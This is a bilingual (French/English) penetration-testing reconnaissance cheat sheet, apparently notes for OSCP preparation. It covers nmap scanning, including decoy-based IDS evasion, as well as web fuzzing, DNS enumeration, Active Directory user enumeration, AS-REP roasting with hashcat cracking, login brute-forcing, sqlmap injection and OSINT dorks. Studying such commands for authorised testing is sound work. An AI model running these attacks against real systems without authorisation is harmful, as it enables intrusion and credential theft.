La reconnaissance (recon) peut être définie comme une enquête ou une observation préliminaire de votre cible (client) sans l’alerter de vos activités. Si vos activités de reconnaissance sont trop bruyants, l’autre partie sera alertée, ce qui pourrait diminuer vos chances de succès.
“If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.” – Sun Tzu
Add the domain in /etc/hosts
if needed
Network scan
Host discovery
Passive host discovery scan (ARP sniff) :
nmap -sn <CIDR>
SMB host :
crackmapexec smb <IP-range>
Windows servers :
nmap -T3 -p53,88,389,445,636 <IP-range> --open
#windows NETBIOS to IP :
ping <hostname>
nslookup <hostname>
Passive scan (ARP sniff) :
sudo netdiscover -i <interface> -r <IP> -p
Active scan :
sudo netdiscover -i <interface> -r <IP>
👺 Impact the network performances
Passive host discovery scan (ARP sniff) :
nmap -sn <CIDR>
Fast scan (Top 1K ports) :
sudo nmap -sS -sU -sV -sC -oA ./quick.txt <IP>
Full scan (Run Again with all ports) :
sudo nmap -p- -sS -sU -sV -sC -oA ./full.txt <IP>
Aggressive fast scan :
nmap -A <IP>
Aggressive host scan (All Enabled – if needed) :
nmap -p0- -v -A -T4 -oA ./aggressive.txt <IP>
Vulnerabily Scan :
nmap -sV -sC --script=vuln -oA ./quick.txt <IP>
Scan from Spoofed IPs (Firewal/IDS evasion) :
nmap -D <IP-1>,...,<IP-n>
Options | Description |
-sC | Scan with default NSE scripts. Considered useful for discovery and safe |
-sS | TCP SYN port scan (Default with root privilege) |
-sT | TCP connect port scan (Default without root privilege) |
-sU | UDP port scan |
-sA | TCP ACK port scan |
-sW | TCP Window port scan |
-sV | Attempts to determine the version of the service running on port |
-A | Agresive mode. Enables OS detection, version detection, script scanning, and traceroute |
-O | OS Fingerprinting |
-T0 | Paranoid (0) Intrusion Detection System evasion |
-T1 | Sneaky (1) Intrusion Detection System evasion |
-T2 | Polite (2) slows down the scan to use less bandwidth and use less target machine |
-T3 | Normal (3) which is default speed |
-T4 | Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable |
-T5 | Insane (5) speeds scan; assumes you are on an extraordinarily fast network |
-oA | Output in the three major formats at once |
-D | (Decoy) Send scans from spoofed IPs |
–script=safe | Won’t affect the target |
–script=vuln | Scan for vulnerabilities |
–script=exploit | Attempt to exploit a vulnerability |
–script=auth | Attempt to bypass authentication for running services (e.g. Log into an FTP server anonymously) |
–script=brute | Attempt to bruteforce credentials for running services |
–script=discovery | Attempt to query running services for further information about the network (e.g. query an SNMP server) |
-oG <file> | Grepable output format |
Nmap Automator -H <IP> -t recon
Automatisation du scan :
- Network : Shows all live hosts in the host’s network (~15 seconds)
- Port : Shows all open ports (~15 seconds)
- Script : Runs a script scan on found ports (~5 minutes)
- Full : Runs a full range port scan, then runs a thorough scan on new ports (~5-10 minutes)
- UDP : Runs a UDP scan “requires sudo” (~5 minutes)
- Vulns : Runs CVE scan and nmap Vulns scan on all found ports (~5-15 minutes)
- Recon : Suggests recon commands, then prompts to automatically run them
- All : Runs all the scans (~20-30 minutes)
IPv4 host discovery : #windows IPv4NetworkScan.ps1 :
powershell -ep bypass
L:\oscp\IPv4NetworkScan.ps1 -StartIPv4Address <IP-start> -EndIPv4Address <IP-end>
Host discovery (ARP) :
arp-scan $ip/24
Directory Listing
ffuf -recursion -u -w <wordlist>
ffuf -u -w <wordlist>
# /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-files.txt
# /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
# /usr/share/wordlists/dirb/common.txt
# /usr/share/wordlists/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt
# /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-directories.txt
# /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
# look for response 200 & 302
# FUZZ.pdf
# FUZZ.txt
# FUZZ.php
# FUZZ.aspx
#/usr/share/wordlists/Security-Wordlist/LFI-WordList-Linux (from github)
Auth cracking :
ffuf -u -X POST -d "username=admin&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -w <wordlist>
Domains \ Subdomains
Search engines
# google search
ffuf -u -H "Host:" -w <wordlist>
# look for response 200 & 302
Reliable records enumeration
for type in A AAAA MX NS TXT CNAME SOA PTR SRV CAA HINFO NAPTR CERT DNAME DNSKEY DS LOC RP SSHFP TLSA; do echo "=== $type records ==="; host -t $type <domain>; echo ""; done
whois <domain> # hébergement
host -a <domain>
host -l <domain> [dns-server]
dnsrecon -d <domain> -t axfr [dns-server] # (active)
dnsenum <domain>
dig @<dns-server> <domain>
nslookup <domain>
sublist3r -d <domain> # multi sources
Reverse IP Lookup
nslookup <IP>
Active Directory
Enumerate AD Users
Bruteforce with Kerbrute
Valid usernames :
sudo ./kerbrute userenum --dc <DC IP> -d <domain> <username.txt>
AS-REP Roasting (AS-REP Roastable users)
Get a KRB_AS_REP :
impacket-GetNPUsers -dc-ip <DC-IP> -request -outputfile hashes.asreproast <domain>/<username>
Crack password :
sudo hashcat -m 18200 hashes.asreproast <wordlist> -r /usr/share/hashcat/rules/best64.rule --force
App Vulnerability
nikto -h <url>
wpscan --url <url> # wordpress <url> # wordPress, joomla, drupal et moodle
whatweb <url> # lister les technologies web utilisées
## Injection
// SQL
sqlmap -u "" -p id # GET Requests
sqlmap -u "" --data "username=*&password=*" # POST Requests
python3 -t http://dev.stocker.htb/login -u username -p password #
nmap -p <port> <IP> --script=<script-name>
searchsploit <technologie>
Frameworks Enumeration
sudo sniper -t <domain>
sudo sniper -t <domain> -m stealth -o -re
# passive + OSINT
sudo amass enum -d <domain> -src -ip
Social / OSINT
- Google Search / Google Image
- Pages de profil (linkedin, twitter, facebook, instagram)
- Offres d’emploi
- Les dépôts Git
- Les forums
# filter by website
# cache search (old version)
cache:<url> <mot-clé>
cache: hello
# search within the html body
# search within the html body (full word)
allintext:<mot-clé> <mot-clé>
allintext:username password
# file type filter
# programing language filter
ext:php or ext:xml or ext:python
# exclusion
See more : ExploitDB, Dorksearch
Outil de reconnaissance fonctionnant sur un système de graphe et de transformations. Nom de domaine –> IP –> Reverse DNS –> Autres noms de domaines
shodan myip
shodan host <host>
> help
> workspaces create <WORKSPACE_NAME>
> db schema # database
> db insert domains # add domain to analyse
> marketplace search <module>
> marketplace info <module>
> marketplace install <module>
> marketplace remove <module>
> modules search <module>
> module load <module>
> options list
> options set SOURCE
> run
recon-ng -w <WORKSPACE_NAME> # start a predefined workspace